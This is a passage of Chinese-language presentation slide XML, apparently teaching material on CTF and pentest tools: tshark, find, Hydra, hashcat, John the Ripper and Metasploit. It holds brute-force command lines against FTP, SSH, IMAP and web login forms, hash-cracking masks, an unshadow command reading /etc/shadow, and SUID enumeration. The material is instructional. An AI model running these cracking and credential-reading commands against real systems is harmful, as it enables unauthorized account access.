            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pP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ZmxhZw==是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flag</a:t>
            </a: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字符串</a:t>
            </a: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的base64编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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666c6167是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flag</a:t>
            </a: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的16进制数值表示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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vortex dir="r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流量分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-tshark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460990" cy="401891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Tshark 是 Wireshark 的命令行版本，它具有捕获和分析网络流量的功能。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常用</a:t>
            </a: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方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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捕获网络流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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 tshark -i eth0 -w capture.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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查看所有可用的网络接口  tshark -D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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设置捕获过滤器 tshark -i eth0 -f "tcp dst port 80"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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从已有的 pcap 文件中读取数据包进行分析 tshark -r capture.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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en-US" alt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使用显示过滤器来过滤数据包  tshark -Y "ip.src == 192.168.0.1"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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-find-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习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按名称查找文件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没有任何参数，列出当前目录下的所有内容。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find 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或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find .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在当前目录中查找名为test.c的文件。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不加参数，默认为按名称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。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find test.c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（模糊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匹配）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查找/home目录下的所有文件中名为test的文件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find /home -name test (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精确匹配，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文件或目录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) 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使用名称并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>忽略大小写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查找文件   -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iname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在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根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目录中查找名称为test的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目录   -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>typd d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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在当前目录中查找名为config.php的所有php文件  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-type f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查找目录中所有的php文件   -type f -name “*.php”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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hydra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7275830" cy="256667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Hydra（或 THC Hydra）是一种并行网络登录破解程序，内置在各种操作系统中，如 Kali Linux、Parrot 和其他主要渗透测试环境。Hydra 的工作原理是使用不同的方法执行暴力攻击，以便猜测正确的用户名和密码组合。Hydra 通常被渗透测试人员与一组程序一起使用，如 crunch、cupp等，用于生成单词列表。然后使用 Hydra 使用这些程序创建的单词列表来测试攻击。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Hydra 支持许多常见的登录协议，如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网站表单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、FTP、SMB、POP3、IMAP、MySQL、VNC、SSH、HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr 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(S)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 等。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6288405" y="4135755"/>
            <a:ext cx="5506085" cy="22205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-hydra-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常用参数及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用法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7695" y="1454785"/>
          <a:ext cx="8101330" cy="4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73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如果服务在不同的默认端口上，通过此参数</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>指定</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="720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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>用户名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p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指定</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>密码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从文件中加载用户</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>名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-P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从文件中加载</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>密码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线程数，默认</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>16</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN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username:password</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>类型的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>文件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-M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要攻击的服务器列表，每行一个，用冒号分隔</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>端口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-hydra-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见用法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664335"/>
            <a:ext cx="9087485" cy="224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hydra -l user -P passlist.txt ftp://192.168.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hydra -l admin -p password ftp://[192.168.0.0/24]/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hydra -L logins.txt -P pws.txt -M targets.txt ssh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爆破网页登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hydra -C user-pass.txt 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host_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> http-post-form '/login:username=^USER^&amp;password=^PASS^&amp;rememberMe=false:F=500'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4208780"/>
            <a:ext cx="10591800" cy="2038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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashcat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489565" cy="212090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hashcat 是世界上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最快、最先进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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（自称）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的密码恢复实用程序，支持 300 多种高度优化的散列算法的五种独特攻击模式。hashcat 目前支持 Linux、</a:t>
            </a:r>
            <a:r>
              <a:rPr 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Windows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和 macOS 上的</a:t>
            </a:r>
            <a:r>
              <a:rPr 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cpu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gpu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和其他硬件加速器，并具有帮助实现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分布式</a:t>
            </a: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密码破解的工具。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支持hashcat的散列算法有Microsoft LM哈希，MD4，MD5，SHA系列，Unix加密格式，MySQL和Cisco PIX等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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常用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489565" cy="508190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-a  指定要使用的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破解模式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，其值参考后面对参数。“-a 0”字典攻击，“-a 1” 组合攻击；“-a 3”掩码攻击。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-m  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指定要破解的hash类型，如果不指定类型，则默认是MD5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-o  指定破解成功后的hash及所对应的明文密码的存放位置,可以用它把破解成功的hash写到指定的文件中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--force 忽略破解过程中的警告信息,跑单条hash可能需要加上此选项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--show  显示已经破解的hash及该hash所对应的明文</a:t>
            </a:r>
            <a:endParaRPr sz="16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--increment  启用增量破解模式,你可以利用此模式让hashcat在指定的密码长度范围内执行破解过程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--increment-min  密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用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--increment-max  密码最大长度,同上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--outfile-format 指定破解结果的输出格式id,默认是3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--username   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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忽略hash文件中的指定的用户名,在破解linux系统用户密码hash可能会用到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--remove     删除已被破解成功的hash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-r       使用自定义破解规则</a:t>
            </a:r>
            <a:endParaRPr sz="16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攻击模式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489565" cy="346202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# | Mode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===+======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0 | Straight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字典破解）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1 | Combination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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（组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破解）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3 | Brute-force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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（暴力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破解）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6 | Hybrid Wordlist + Mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 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（字典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掩码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破解）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7 | Hybrid Mask + Wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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atin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（掩码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破解）</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym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latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  9 | Association</a:t>
            </a:r>
            <a:endParaRPr sz="16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支持的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hash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979295"/>
            <a:ext cx="8356600" cy="370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8450" y="1321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hashcat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>h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掩码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符集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770" y="1411605"/>
            <a:ext cx="8953500" cy="2938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? | Charset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> ===+=========</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>   l | abcdefghijklmnopqrstuvwxyz [a-z]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  d | 0123456789                 [0-9]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  h | 0123456789abcdef           [0-9a-f]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  H | 0123456789ABCDEF           [0-9A-F]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  s |  !"#$%&amp;'()*+,-./</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  a | ?l?u?d?s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  b | 0x00 - 0xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>f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掩码</a:t>
            </a:r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770" y="1609725"/>
            <a:ext cx="9380220" cy="2734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八位数字密码：?d?d?d?d?d?d?d?d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>八位未知密码：?a?a?a?a?a?a?a?a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>前四位为大写字母，后面四位为数字：?u?u?u?u?d?d?d?d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>前四位为数字或者是小写字母，后四位为大写字母或者数字：?h?h?h?h?H?H?H?H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>前三个字符未知，中间为admin，后三位未知：?a?a?aadmin?a?a?a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6-8位数字密码：--increment --increment-min 6 --increment-max 8 ?l?l?l?l?l?l?l?l</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6-8位数字+小写字母密码：--increment --increment-min 6 --increment-max 8 ?h?h?h?h?h?h?h?h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自定义字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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0415" y="1542415"/>
            <a:ext cx="9380220" cy="4570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hashcat支持用户最多定义4组字符集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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--custom-charset1 [chars]等价于 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-1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--custom-charset2 [chars]等价于 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-2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--custom-charset3 [chars]等价于 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--custom-charset4 [chars]等价于 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在掩码中用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?1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、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?2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、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?3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、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?4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>来表示。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示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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altLang="zh-CN"/>
              <a:t>--custom-charset1 abcd123456!@-+。然后我们就可以用"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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?1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"去表示这个字符集了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>--custom-charset2 ?l?d，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?2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>就等价于?h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-1 ?d?l?u，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?1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>就表示数字+小写字母+大写字母</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-3 abcdef  -4 123456  那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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?3?3?3?3?4?4?4?4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>就表示为前四位可能是“abcdef”，后四位可能是“123456”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-find-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习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按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限查找文件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查找权限为777的所有文件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-type f -perm 0777 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-print</a:t>
            </a:r>
            <a:endParaRPr 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查找没有777权限的文件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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-type f ! -perm 0777 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-print</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill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查找具有644权限的SGID文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  -perm 2644</a:t>
            </a:r>
            <a:endParaRPr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查找SUID文件   find / -perm /u=s 或 find / -perm /4000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查找只读文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  find / -perm /u=r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查找可执行文件  find / -perm /a=x  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/a 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所有用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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查找并删除</a:t>
            </a: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特定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文件  find / -type f -name "test.c" -exec rm -f {} \;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密码破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-hashcat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>案例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0415" y="1542415"/>
            <a:ext cx="9380220" cy="3637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破解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md5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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altLang="zh-CN"/>
              <a:t>hashcat e10adc3949ba59abbe56e057f20f883e -m 0 -a 3 ?d?d?d?d?d?d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hashcat e10adc3949ba59abbe56e057f20f883e -m 0 -a 3 ?d?d?d?d?d?d --show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破解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office</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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zh-CN" altLang="en-US"/>
              <a:t>生成文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sudo office2john /root/Desktop/office_crack.xls &gt; offce_crack.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破解： hashcat '$oldoffice$0*9475653082e4c193dda2535584eb3e3b*a9aa4d2e3db794097d95fe66273bb134*7919931b763e283242afa81537560630' -m 9700 -a 3 aA?d?d?d?d?d?d --show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-john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9410" y="1360170"/>
            <a:ext cx="10139680" cy="242443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sz="1600">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>John the Ripper是一款开源的密码安全审计和密码恢复工具，可用于许多操作系统。John the Ripper jumbo 支持数百种哈希和密码类型，包括：各种 Unix 版本（Linux、*BSD、Solaris、AIX、QNX 等）、macOS、Windows 的用户密码，“网络应用程序”（例如 WordPress）、群件（例如 Notes/Domino）和数据库服务器（SQL、LDAP 等）；网络流量捕获（Windows 网络身份验证、WiFi WPA-PSK 等）；加密私钥（SSH、GnuPG、加密货币钱包等）、文件系统和磁盘（macOS 的.dmg 文件和 “稀疏捆绑包”、Windows BitLocker 等）、存档文件（ZIP、RAR、7z）以及文档文件（PDF、Microsoft Office 的文件等）。这些只是一些例子，还有更多。</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="060607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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>john-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常用参数及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用法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7695" y="1454785"/>
          <a:ext cx="8101330" cy="4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075"/>
                <a:gridCol w="5342255"/>
              </a:tblGrid>
              <a:tr h="4273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--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>format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表明</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>类型</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="7207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---wordlist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字典</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>模式，从 FILE 或标准输入读取单词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--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>show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显示破解的密码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--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>incremental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增量</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>模式</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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爆破工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>john-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见用法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5155" y="1560830"/>
            <a:ext cx="9087485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unshadow /etc/passwd /etc/shadow &gt; pass_hash.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>john pass_hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>john --wordlist=/path/xxx  pass_hash.txt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2830195"/>
            <a:ext cx="10356850" cy="27559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1"/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33217" y="3239439"/>
            <a:ext cx="719255" cy="3790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668" y="2967981"/>
            <a:ext cx="39039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etasploit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msfarch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1340485"/>
            <a:ext cx="7679690" cy="501586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辅助模块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889490" cy="227838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000" b="1"/>
              <a:t>Auxiliary-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>辅助模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>-1248</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>-辅助模块不利用目标，但可以执行有用的任务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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管理 - 修改、操作或操纵目标机器上的某些内容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分析 - 执行分析任务，主要是密码破解工具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收集 - 从单个目标中收集、收集或枚举数据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拒绝服务 - 崩溃或减慢目标机器或服务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扫描 - 扫描已知漏洞的目标服务器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支持 - 运行常见协议（如SMB、FTP等）的服务器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编码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511300"/>
            <a:ext cx="10631805" cy="1654175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>Encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>编码模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>47</a:t>
            </a:r>
